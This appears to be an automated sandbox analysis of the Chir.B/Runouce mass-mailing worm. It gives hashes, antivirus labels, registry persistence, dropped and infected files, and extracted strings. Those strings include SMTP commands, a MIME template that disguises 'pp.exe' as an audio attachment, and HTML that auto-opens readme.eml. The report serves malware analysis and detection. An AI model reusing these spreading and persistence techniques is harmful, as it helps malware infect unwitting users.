Analysis Date2015-05-11 15:54:02
MD5d6980a5ca9d124f6cd0fe4381111ec2d
SHA1db46bc1470d695bb1f240a82b573e5aa6c4e4b6e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 4d45cea78f3ab9f4fead024bd33ce5a1 sha1: 4f574f1ea1198062053208332d2fbfd95fb1563d size: 59392
Section.rdata md5: b6f626c36f35902475f8149097675376 sha1: 23de5ae8c94087d3d33b45310aba913eba34d067 size: 20992
Section.data md5: e6d38ab08a9fe9cbad2d493ca324a0c0 sha1: 41675827a2fa71ab58afa301fe7a2dde3c720ca4 size: 15360
Section.rsrc md5: 368984655474c48ed5f22798ec05c489 sha1: 950d704675e44330310ebb998518e4d608c82a76 size: 193532
Timestamp2013-04-14 15:26:01
Pdb pathc:\winter\Set\Bottom\Up\value\wild\industry\Support\nearcare.pdb
PackerArmadillo v4.x
PEhash46049fdc00b58e37bd43064f11a993a2e9e683c0
IMPhashb2498eed3c3aa5befc085379b8319a74
AVAd-AwareTrojan.Gamarue.AP
AVAlwil (avast)Oncer:Win32:Oncer
AVArcabit (arcavir)Trojan.Gamarue.AP
AVAuthentiumW32/Thecid.B@mm
AVAvira (antivir)W32/Chir.B
AVBitDefenderTrojan.Gamarue.AP
AVBullGuardTrojan.Gamarue.AP
AVCA (E-Trust Ino)Win32/Chir.B
AVCAT (quickheal)W32.Runouce.B
AVClamAVWIN.Worm.Brontok
AVDr. WebBackDoor.Andromeda.178
AVEmsisoftTrojan.Gamarue.AP
AVEset (nod32)Win32/Chir.B virus
AVFortinetW32/Chir.B@mm
AVFrisk (f-prot)W32/Thecid.B@mm
AVF-SecureTrojan.Gamarue.AP
AVGrisoft (avg)Win32/Chir.B@mm
AVIkarusTrojan-Downloader.Win32.Andromeda
AVK7EmailWorm ( 00176e371 )
AVKasperskyEmail-Worm.Win32.Runouce.b
AVMalwareBytesTrojan.Downloader
AVMcafeeW32/Chir.b@MM
AVMicrosoft Security EssentialsVirus:Win32/Chir.B@mm
AVMicroWorld (escan)Trojan.Gamarue.AP
AVPadvishDownloader.Win32.Gamarue.AA
AVRisingWorm.ChineseHacker-2.b
AVSophosW32/Chir-B
AVSymantecW32.Chir.B@mm
AVTrend MicroPE_Chir.B
AVTwisterTrojan.6168@1300C3@18000.mg
AVVirusBlokAda (vba32)Virus.Win32.Chur.A

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runonce ➝
C:\WINDOWS\system32\runouce.exe\\x00^\\xb9\\x10\\x00\\x01\\x00\\x0b\\x00\\x00\\x00\\x00\\x00\\xdf\\x07\\x05\\x00\\x01\\x00\\x0b\\x00\\x15\\x002\\x00)\\x00\\xaf\\x02\\x01\\x00\\x00\\x00@\\xfe\\x12\\x00\\x00\\x00\\x00\\x00x\\x00\\x00\\x00\\xd0\\xcf\\x90|x\\xfe\\x12\\x00\\x88\\xfe\\x12\\x00\\xd1Wlev]neo]ne\\x1f_ne\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00!^nex\\x00\\x00\\x00\\x03\\x01\\x00\\x00\\x00\\xf0\\xfd\\x7f\\x03\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc4\\x04\\x00\\x00\\x88\\xfe\\x12\\x000\\xae\\x80|t\\xb8me!\\x00\\x00\\x00x\\xff\\x12\\x00\\x98\\xfe\\x12\\x000\\xae\\x80|D\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00t\\x00\\x00\\x00x\\x00\\x00\\x00\\x04\\x07\\x00\\x00Z\\xd0I\\x00
Creates FileC:\WINDOWS\system32\runouce.exe
Creates ProcessC:\malware.exe
Creates MutexChineseHacker-2

Process
↳ C:\malware.exe

Creates MutexChineseHacker-2

Process
↳ C:\WINDOWS\system32\runouce.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runonce ➝
C:\WINDOWS\system32\runouce.exe\\x00^\\xb9\\x10\\x00\\x01\\x00\\x0b\\x00\\x00\\x00\\x00\\x00\\xdf\\x07\\x05\\x00\\x01\\x00\\x0b\\x00\\x15\\x002\\x002\\x00k\\x03\\x01\\x00\\x00\\x00\\x8c\\xcf\\x90|\\\xa1A~p\\x00\\x00\\x00\\xd0\\xcf\\x90|x\\xfe\\x12\\x00\\x88\\xfe\\x12\\x00\\xd1Wlev]neo]ne\\x1f_ne\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00!^nep\\x00\\x00\\x00\\x03\\x01\\x00\\x00\\x00`\\xfd\\x7f\\x03\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x9c\\x00\\x00\\x00\\x88\\xfe\\x12\\x000\\xae\\x80|t\\xb8me!\\x00\\x00\\x00x\\xff\\x12\\x00\\x98\\xfe\\x12\\x000\\xae\\x80|D\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00l\\x00\\x00\\x00p\\x00\\x00\\x000\\x04\\x00\\x00ZZ@\\x00
Creates FileReview02.html
Creates Filelicense.html
Creates Fileisignup.exe
Creates FileClear Day.htm
Creates FileReview04.html
Creates FileHanko04.html
Creates FileTechnical.htm
Creates Filemsmsgs.exe
Creates FileSign07.html
Creates FileHowTo07.html
Creates FileHowTo00.html
Creates FileSweets.htm
Creates FileMicrosoft Visual C++ 2010 x86 Redistributable Setup_20130508_125854937.html
Creates Filemonitor.exe
Creates FileDW20.EXE
Creates Filesetup.exe
Creates FileSign09.html
Creates FileSunflower.htm
Creates FileReview06.html
Creates FileHowTo06.html
Creates FileAcroRd32.exe
Creates Filerunouce.exe
Creates Filereadme.eml
Creates Filereader_sl.exe
Creates FileReview21.html
Creates FileReview09.html
Creates FileReview08.html
Creates FileSign02.html
Creates FileHanko01.html
Creates FileHanko.html
Creates Filemsimn.exe
Creates FileReview20.html
Creates FileReview01.html
Creates Filewab.exe
Creates FileHanko02.html
Creates FileSign13.html
Creates Filewabmig.exe
Creates FileReview17.html
Creates FileSign05.html
Creates Filemalware.exe
Creates Fileconf.exe
Creates FileReview22.html
Creates FileIvy.htm
Creates FileReview14.html
Creates FileNetwork Blitz.htm
Creates Fileicwconn2.exe
Creates Filesetup50.exe
Creates Filecb32.exe
Creates FileReview28.html
Creates Filesapisvr.exe
Creates FileSetup.exe
Creates Fileicwtutor.exe
Creates FileReadMe.htm
Creates FileNature.htm
Creates FileHowTo08.html
Creates FileHowTo04.html
Creates FileReview05.html
Creates FileFiesta.htm
Creates FileReview12.html
Creates FileReview13.html
Creates FileSign.html
Creates FileMDACReadme.htm
Creates FilePIPE\wkssvc
Creates FileForms.html
Creates FileReview11.html
Creates FilePie Charts.htm
Creates Fileiedw.exe
Creates FileAdobeUpdateManager.exe
Creates FileReview.html
Creates Fileicwconn1.exe
Creates FileSign04.html
Creates FileSign11.html
Creates FileGlacier.htm
Creates FileSign06.html
Creates FileForms02.html
Creates Filemsnsusii.exe
Creates FileHowTo01.html
Creates Fileicwrmind.exe
Creates FileMaize.htm
Creates FileBlank.htm
Creates Filemsinfo32.exe
Creates FileDWTRIG20.EXE
Creates FileHowTo05.html
Creates Filemoviemk.exe
Creates FileReview07.html
Creates FileHanko05.html
Creates Fileacroaum.exe
Creates FilePIPE\DAV RPC SERVICE
Creates Filenetmeet.htm
Creates FileLeaves.htm
Creates FileReview18.html
Creates FileReview16.html
Creates FileMsncli.exe
Creates FileHowTo02.html
Creates FileHowTo.html
Creates FileReview10.html
Creates Filewb32.exe
Creates FileHowTo03.html
Creates FileDigcore.exe
Creates Fileinetwiz.exe
Creates FileHanko03.html
Creates FileReview19.html
Creates FileCitrus Punch.htm
Creates Filepicturetasks_ENU.html
Creates Fileinstmsiw.exe
Creates FileReview23.html
Creates FileAcroRd32Info.exe
Creates FileForms01.html
Creates Fileoemig50.exe
Creates FileEngineering07.html
Creates FileIEXPLORE.EXE
Creates FileReview03.html
Creates ProcessC:\WINDOWS\system32\runouce.exe
Creates MutexChineseHacker-2

Process
↳ C:\WINDOWS\system32\runouce.exe

Creates MutexChineseHacker-2

Process
↳ C:\WINDOWS\Explorer.EXE

Creates ProcessC:\WINDOWS\system32\runouce.exe

Network Details:


Raw Pcap

Strings
.
.
.
.
-e-
. 
\
CC.
 
.
D.
.

%2Tb
=4|J
                                 H
         (((((                  H
?H=a
h/GIAXc
         h((((                  H
h%%k
P5j=
,pcO
$S8C
^wZb
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0@ H(2
0SSSSS
0/$ $Z
1yEE$$
[2EwE"
33EE33/
3EEEEE
%%$3$M
3N3	EE
3UEE$$M
&3Z3;3
4EE33g
-4zbT|
}~%8%<
8VVVVV
a?33$$
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
ADVAPI32.DLL
An application has made an attempt to load the C runtime library incorrectly.
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD`
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<at9<rt,<wt
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
.?AVCHandleMap@@
BC"&e&
B Od(l
--#BOUNDARY#
btamail.net.cn
C3?uTu
ChineseHacker-2
CloseHandle
closesocket
CoCreateInstance
CoInitialize
connect
CONOUT$
Content-id: THE-CID
Content-Transfer-Encoding: base64
Content-Transfer-Encoding: quoted-printable
Content-Type: audio/x-wav; name="pp.exe"
Content-type: multipart/mixed; boundary="#BOUNDARY#"
Content-Type: text/html
CorExitProcess
CoUninitialize
CreateFileA
CreateKernelThread
CreateMutexA
CreateRemoteThread
CreateThread
- CRT not initialized
c:\winter\Set\Bottom\Up\value\wild\industry\Support\nearcare.pdb
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DgCYfB
=.doct
DOMAIN error
|Em/vE%%
En2GD 
EncodePointer
EnterCriticalSection
Euuuu3M
=.exetS=.scrtL=.htmt
ExitProcess
February
F\= fA
FindClose
FindFirstFileA
FindNextFileA
FindWindowA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
FROM: %s@yahoo.com
FVh0	A
GetACP
GetActiveWindow
GetCommandLineA
GetComputerNameA
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDriveTypeA
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
gethostbyname
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemDirectoryA
GetSystemTime
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersionExA
GetWindow
GetWindowThreadProcessId
guide six
GWh0	A
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
HELO btamail.net.cn
HH:mm:ss
<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
=htmlt
.idata
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
JanFebMarAprMayJunJulAugSepOctNovDec
January
jF<-uH
j`hhFA
j@j ^V
kernel32.dll
KERNEL32.dll
KERNEL32.DLL
_lclose
LCMapStringA
LCMapStringW
_lcreat
LeaveCriticalSection
_llseek
LoadLibraryA
_lopen
_lread
_lwrite
MAIL FROM: imissyou@btamail.net.cn
MessageBoxA
mh3t3i
Microsoft Visual C++ Runtime Library
MIME-Version: 1.0
.mixcrt
MM/dd/yy
Monday
MPR.DLL
mscoree.dll
MultiByteToWideChar
Net Send * My god! Some one killed ChineseHacker-2 Monitor
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
.nyGex
October
$O$$$EE
ole32.dll
OpenProcess
Please contact the application's support team for more information.
PPPPPPPP
PrepareTape
Program: 
<program name unknown>
- pure virtual function call
QueryPerformanceCounter
RCPT TO: %s
`.rdata
ReadFile
readme.eml
REEEE{S
RegisterServiceProcess
RegNotifyChangeKeyValue
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
.reloc
RnnCW_
RSDSKG
RtlUnwind
Runonce
\runouce.exe
runtime error 
Runtime Error!
Saturday
SendMessageA
September
SetCurrentDirectoryA
SetEndOfFile
SetFileAttributesA
SetFilePointer
SetFileTime
SetHandleCount
SetLastError
SetStdHandle
SetUnhandledExceptionFilter
SING error
socket
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SrdF_?
^SSSSS
SUBJECT: %s is comming!
Sunday
SunMonTueWedThuFriSat
t$$%%]
t^9(uZ
tD9(u@
TerminateProcess
TerminateThread
tGHt.Ht&
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
This program must be run under Win32
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
@to@e@
TO: %s
t#SSUP
_tt333
ttECEa
t$<"u	3
Tuesday
;t$,v-
t$$VSS
t+WWVPV
tX%%EE
U[$=$33
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UNICODE
UQPXY]Y[
URPQQh(\@
USER32.DLL
UTF-16LE
uu$$;$Q$
uuuDt%
V4Xf=`
VirtualAlloc
VirtualAllocEx
VirtualFree
VirtualProtect
v	N+D$
w3>3uu
w6QjDWS
=.wabt!=.adct%=r.dbt
WaitForSingleObject
Wednesday
WideCharToMultiByte
WinExec
    =winntv=windto
*'W`K?
WNetCloseEnum
WNetEnumResourceA
WNetOpenEnumA
<": %Wo
WriteConsoleA
WriteConsoleW
WriteFile
WriteProcessMemory
WSACleanup
WSAStartup
WSOCK32.DLL
wsprintfA
=.xlst
youkind
>=Yt/j
_^][YY
YYu-9D$
YYuTVWh*